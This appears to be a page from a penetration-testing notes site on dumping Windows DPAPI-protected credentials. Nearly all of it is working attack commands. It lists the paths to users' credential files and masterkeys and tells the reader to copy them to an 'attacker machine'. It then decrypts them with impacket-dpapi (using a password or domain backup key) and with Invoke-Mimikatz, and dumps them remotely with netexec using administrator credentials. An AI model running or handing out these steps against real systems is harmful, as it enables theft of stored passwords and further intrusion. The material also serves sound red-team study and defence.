DPAPI

Credentials Dumping from Data Protection API

From Low Users

Manual Approach

Locating credential files:

dir /A C:\Users\yuyudhn\AppData\Local\Microsoft\Credentials\
dir /A C:\Users\yuyudhn\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Force C:\Users\yuyudhn\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Force C:\Users\yuyudhn\AppData\Roaming\Microsoft\Credentials\

Locating masterkeys:

dir /A C:\Users\yuyudhn\AppData\Roaming\Microsoft\Protect\
dir /A C:\Users\yuyudhn\AppData\Local\Microsoft\Protect\
Get-ChildItem -Force C:\Users\yuyudhn\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Force C:\Users\yuyudhn\AppData\Local\Microsoft\Protect\

Usually, the structure is like this:

C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID

Download all credential files and masterkeys to attacker machine. And then extract the credentials using impacket-dpapi.

Decrypt masterkey

impacket-dpapi masterkey -file $masterkey -sid $SID -password Password1213!

Or if you have the backup key:

impacket-dpapi masterkey -file $masterkey -sid $SID -pvk key.pvk

Grab credentials:

impacket-dpapi credential -file $credsfile -key $decryptedkey

Mimikatz

Invoke-Mimikatz -Command '"dpapi::masterkey /in:C:\Users\yuyudhn\AppData\Roaming\Microsoft\Protect\$SID\$GID /sid:$SID /password:Password1337 /protected" "exit"'
Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Users\yuyudhn\AppData\Roaming\Microsoft\Credentials\$credsfile /masterkey:$decryptedkey"'

From Administrator

netexec smb target.local -u Administrator -p Password123 --local-auth --dpapi

Other tools

PreviousGroup Policy PreferencesNextDefense Evasion

Last updated